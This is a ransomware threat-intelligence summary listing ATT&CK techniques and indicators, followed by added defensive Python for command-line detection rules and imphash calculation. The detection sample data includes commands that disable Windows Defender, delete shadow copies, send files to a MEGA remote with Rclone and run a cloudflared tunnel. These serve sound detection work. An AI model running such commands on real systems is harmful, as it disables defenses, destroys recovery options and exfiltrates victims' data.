Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape | Google Cloud Blog

Ransomware actors continued to evolve in 2025, with a record number of victims posted to data leak sites, increased use of data-theft extortion, continued targeting of VPNs and firewalls through vulnerability exploitation, and a notable prevalence of REDBIKE ransomware. The ecosystem also showed signs of declining profitability and operational shifts, such as increased targeting of smaller organizations, use of tunnelers and abuse of remote monitoring and management (RMM) tools, and integration of AI and Web3 technologies.

Key points

  • Exploitation of vulnerabilities was the most common initial access vector, most frequently in VPN and firewall products from Fortinet, SonicWall, Palo Alto Networks, and Citrix.
  • Approximately 77% of analyzed ransomware intrusions involved suspected or confirmed data theft, up from approximately 57% in 2024, with tools such as Rclone and MEGASync commonly used for exfiltration.
  • REDBIKE was the most frequently observed ransomware family in Mandiant investigations, appearing in roughly 30% of incidents.
  • In approximately 43% of incidents, threat actors targeted virtualization infrastructure (ESXi and vCenter), and some operations automated portions of ransomware deployment against virtual hosts.
  • Common post-compromise techniques included credential theft (MIMIKATZ, LSASS and NTDS.dit dumps), lateral movement via RDP, SMB, and SSH, and persistence via scheduled tasks, services, and tunnelers (CLOUDFLARED, VIPERTUNNEL, SYSTEMBC).
  • Actors used anti-detection and anti-recovery tactics such as disabling Windows Defender, deleting backups and Volume Shadow Copies (VSS), clearing event logs, and tampering with backup systems to frustrate recovery.
  • The RaaS ecosystem remained resilient despite law enforcement action and actor-driven disruptions, with new or rebranded operators (e.g., Qilin, Akira, LOCKBIT.WARLOCK) filling vacuums and some actors adopting AI and Web3 technologies.

MITRE ATT&CK Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of vulnerabilities was the most common initial access vector, targeting VPNs and firewalls (‘the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls.’).
  • [T1189] Drive-by Compromise – Web compromise, malvertising, and SEO poisoning were used to distribute initial payloads (‘leverag[ed] malvertising and/or search engine optimization (SEO) tactics to distribute malware payloads’).
  • [T1078] Valid Accounts – Compromised or attacker-created legitimate accounts were used for access and persistence (‘the threat actor leveraged compromised legitimate credentials to access the victim environment’).
  • [T1110] Brute Force – Brute-force attacks against VPN and other accounts were used to gain initial access (‘the threat actor conducted periodic bruteforce attacks against various VPN user accounts over the course of nearly a year’).
  • [T1021] Remote Services – RDP, SMB, and SSH were abused extensively for lateral movement and execution (‘in approximately 85% of intrusions, threat actors leveraged RDP…’; ‘leveraged SMB for lateral movement’; ‘used PuTTY and KiTTY to establish SSH connections’).
  • [T1021.001] Remote Desktop Protocol – RDP was used with compromised or attacker-created accounts for lateral movement (‘in approximately 85% of intrusions, threat actors leveraged RDP’).
  • [T1021.002] SMB/Windows Admin Shares – SMB was used to access shares, stage payloads, and execute ransomware (‘leveraged SMB to access various network shares and used this access to stage a copy of NETSCAN on multiple hosts’).
  • [T1021.004] SSH – SSH was used for lateral movement to ESXi and other hosts (‘used PuTTY and KiTTY to establish SSH connections to hosts, particularly when moving laterally to ESXi systems’).
  • [T1003] OS Credential Dumping – Credentials were harvested via LSASS memory dumps, NTDS.dit copies, and registry hive exports (‘dumping the Local Security Authority Subsystem Service (LSASS) process memory, copying the Active Directory domain database (NTDS.dit) file, and exporting the SAM, SYSTEM, and SECURITY registry hives’).
  • [T1003.001] LSASS Memory – LSASS memory dumps were used to obtain credentials (‘dumping the Local Security Authority Subsystem Service (LSASS) process memory’).
  • [T1555] Credentials from Password Stores – Actors targeted password managers and browser-stored credentials (KeePass, Bitwarden, Chromium-based browsers) (‘accessed a self-hosted Bitwarden server and exported and exfiltrated the contents of the vault database’).
  • [T1558] Steal or Forge Kerberos Tickets – Kerberoasting (T1558.003) and related Kerberos attacks were used against Windows authentication (‘Other observed methods include Kerberoasting’).
  • [T1059] Command and Scripting Interpreter – PowerShell (T1059.001) was used heavily for reconnaissance, credential theft, and execution; threat actors consistently used it to query Active Directory, and many Base64-encoded PowerShell commands were observed.
  • [T1053] Scheduled Task/Job – Scheduled tasks (T1053.005) were created to maintain persistence and to run tunnelers or disable defenses (‘registered a scheduled task to run the LIONSHARE tunneler every 12 hours’).
  • [T1543] Create or Modify System Process – Windows services (T1543.003) were created to persistently run malware and ransomware (‘created a Windows service to run a command to execute the ransomware payload’).
  • [T1562] Impair Defenses – Security products and settings were disabled or modified (T1562.001), including Defender registry changes and exclusions (‘ran commands to modify a variety of values associated with Windows Defender registry keys’).
  • [T1490] Inhibit System Recovery – Backups and snapshots were deleted, or backup systems compromised, to hinder recovery (‘deleted vCenter backup volumes’; ‘deleted backups and snapshots prior to encryption’).
  • [T1567] Exfiltration Over Web Service – Legitimate cloud and web services (MEGA, OneDrive, Azure, Cloudzy) and tools such as Rclone were used to exfiltrate stolen data (T1567.002) (‘ran Rclone to exfiltrate data…’; ‘transferring stolen data to attacker-controlled OneDrive accounts’).
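To make the post-compromise techniques in the key points and the technique list above concrete, here is an added detection example. It is my code, not code from the Mandiant report or from Google Cloud: it runs a handful of command-line rules over constructed process-creation records (Sysmon Event ID 1 / Security 4688 shape) for Defender tampering, shadow-copy deletion, Rclone exfiltration, scheduled tasks that launch a tunneler, and Base64-encoded PowerShell, which it decodes and inspects for Active Directory reconnaissance. It then correlates distinct techniques per host, since a machine that both deletes shadow copies and runs Rclone is a much stronger signal than either event alone. The sample records, rule names, regexes, and the correlation threshold are assumptions for illustration; the technique IDs are ATT&CK's.

```python
import base64
import re
from collections import defaultdict

# Constructed process-creation records (Sysmon EID 1 / Security 4688 shape).
# They are invented for this example and are not data from the report.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": 'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" '
                '/v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"host": "FS01", "user": "CORP\\svc_backup",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "FS01", "user": "CORP\\svc_backup",
     "cmdline": "C:\\Temp\\rclone.exe copy D:\\Finance mega:dump --transfers 16 -q"},
    {"host": "DC01", "user": "CORP\\admin",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + base64.b64encode("Get-ADComputer -Filter *".encode("utf-16-le")).decode()},
    {"host": "WS02", "user": "CORP\\jdoe",
     "cmdline": 'schtasks /create /tn Updater /sc hourly /mo 12 '
                '/tr "C:\\ProgramData\\cloudflared.exe tunnel run --token REDACTED"'},
    {"host": "WS02", "user": "CORP\\jdoe",
     "cmdline": "notepad.exe C:\\Users\\jdoe\\notes.txt"},
]

# (rule name, ATT&CK technique, pattern). Rule names are mine, not the report's.
RULES = [
    ("defender_tamper", "T1562.001",
     re.compile(r"Windows Defender.*(DisableAntiSpyware|DisableRealtimeMonitoring|Exclusions)"
                r"|Set-MpPreference.*-Disable|Add-MpPreference.*-Exclusion", re.I)),
    ("shadow_copy_delete", "T1490",
     re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete|wbadmin\s+delete"
                r"|bcdedit.*recoveryenabled\s+no", re.I)),
    ("rclone_exfil", "T1567",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move|moveto)\b", re.I)),
    ("tunneler_persistence", "T1053.005",
     re.compile(r"schtasks.*/create.*(cloudflared|ngrok|chisel|ligolo|plink)", re.I)),
    ("log_clear", "T1070.001",
     re.compile(r"wevtutil\s+(cl|clear-log)\b|Clear-EventLog", re.I)),
]

# -e / -ec / -enc / -EncodedCommand followed by the Base64 blob.
ENC_FLAG = re.compile(r"(?<!\S)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
AD_RECON = re.compile(r"Get-AD(User|Computer|Group|GroupMember|DomainController)|Get-Domain\w+", re.I)


def decode_encoded_powershell(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Apply every rule to each record; one alert per (record, rule) hit."""
    alerts = []
    for ev in events:
        for name, technique, rx in RULES:
            m = rx.search(ev["cmdline"])
            if m:
                alerts.append({"host": ev["host"], "user": ev["user"], "rule": name,
                               "technique": technique, "detail": m.group(0)})
        script = decode_encoded_powershell(ev["cmdline"])
        if script is not None:
            recon = [m.group(0) for m in AD_RECON.finditer(script)]
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "rule": "encoded_powershell", "technique": "T1059.001",
                           "detail": f"{script[:80]!r} ad_recon={recon}"})
    return alerts


def hosts_with_chained_ttps(alerts, min_techniques=2):
    """Hosts on which at least min_techniques distinct techniques fired (sorted)."""
    by_host = defaultdict(set)
    for a in alerts:
        by_host[a["host"]].add(a["technique"])
    return sorted(h for h, t in by_host.items() if len(t) >= min_techniques)


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for a in found:
        print(f'{a["host"]:5} {a["technique"]:9} {a["rule"]:22} {a["detail"]}')
    print("hosts with chained techniques:", hosts_with_chained_ttps(found))
```

Single hits on vssadmin, schtasks, or rclone are noisy where administrators use those tools legitimately, so the per-host correlation (here FS01) is the alert to raise at high severity. A production rule set would also key on image path and parent process rather than command line alone, because actors rename and relocate binaries.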

Indicators of Compromise

  • [CVE] Exploited vulnerabilities used for initial access – CVE-2024-21762 (Fortinet FortiOS SSL VPN) and CVE-2025-53770 (Microsoft SharePoint Server, on-premises), plus the other CVEs referenced in Table 1.
  • [File name] Ransom note and payload filenames – ‘akira_readme.txt’, ‘INC-README’, and other ransom note/readme filenames observed in deployed ransomware.
  • [Onion domain] Tor negotiation and data leak sites – ‘akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion’ and generic ‘.onion’ negotiation site references in YARA rules.
  • [YARA / imphash] Detection signatures referenced in the report – pe.imphash ‘ff67c703589f775db9aed5a03e4489b0’ (SAFEPAY) and multiple YARA rule strings/hex patterns provided for AGENDA, REDBIKE, CLOP, INC, PLAYCRYPT, and others.
  • [Ransomware family] Observed malware and extortion brands – REDBIKE, AGENDA, INC, CLOP (with many more families and data leak site (DLS) brands listed in Table 3).
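The SAFEPAY indicator above is an import hash (imphash), and it helps to know exactly what that value is a hash of before pivoting on it. The following is an added example of the imphash computation in plain Python (my code, not the report's and not a reimplementation shipped by Google Cloud), written to match how pefile and YARA's pe.imphash() normalise the import table: library names are lower-cased and lose .dll/.ocx/.sys, functions imported by ordinal are resolved through a lookup table or rendered as ordN, and the comma-joined string is MD5-hashed. The import table and the tiny ordinal table are constructed assumptions; the sample will not match the SAFEPAY value, which is the point of the last check.

```python
import hashlib

# Stand-in for pefile's ordinal lookup (it ships full tables for ws2_32.dll,
# wsock32.dll and oleaut32.dll). Assumption: only these ws2_32 ordinals are needed
# for the constructed sample below.
ORDINAL_NAMES = {"ws2_32": {1: "accept", 2: "bind", 3: "closesocket", 23: "socket"}}

STRIPPED_EXTENSIONS = (".dll", ".ocx", ".sys")


def imphash_string(imports):
    """Normalised 'lib.func,lib.func,...' string that imphash hashes.

    imports: (dll_name, function_name or ordinal_int) pairs in import-table order.
    Order matters: the same imports in a different order hash differently, which
    is why a relinked build of the same source can change imphash.
    """
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        for ext in STRIPPED_EXTENSIONS:
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        if isinstance(func, int):
            name = ORDINAL_NAMES.get(lib, {}).get(func, f"ord{func}")
        else:
            name = func
        parts.append(f"{lib}.{name}".lower())
    return ",".join(parts)


def imphash(imports):
    """MD5 of the normalised import string, as pe.imphash() in YARA computes it."""
    return hashlib.md5(imphash_string(imports).encode()).hexdigest()


def matches_any(imports, known_hashes):
    """True if this import table hashes to one of the known imphashes (case-insensitive)."""
    return imphash(imports) in {h.lower() for h in known_hashes}


# Constructed import table (not taken from any real sample) resembling what a
# small Windows ransomware loader might import.
SAMPLE_IMPORTS = [
    ("KERNEL32.dll", "CreateFileW"),
    ("KERNEL32.dll", "FindFirstFileW"),
    ("ADVAPI32.dll", "CryptAcquireContextW"),
    ("WS2_32.dll", 23),
    ("WS2_32.dll", 999),
]

# imphash published for SAFEPAY in the report; the constructed table will not match it.
SAFEPAY_IMPHASH = "ff67c703589f775db9aed5a03e4489b0"

if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
    print("matches SAFEPAY:", matches_any(SAMPLE_IMPORTS, [SAFEPAY_IMPHASH]))
```

In a YARA rule the equivalent condition is `import "pe"` followed by `pe.imphash() == "ff67c703589f775db9aed5a03e4489b0"`. Because the hash covers import order and names rather than code, it clusters binaries built from the same toolchain and source layout, so treat an imphash match as a lead to confirm with the string and hex patterns the report also provides rather than as proof of family on its own.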

Read more: https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape/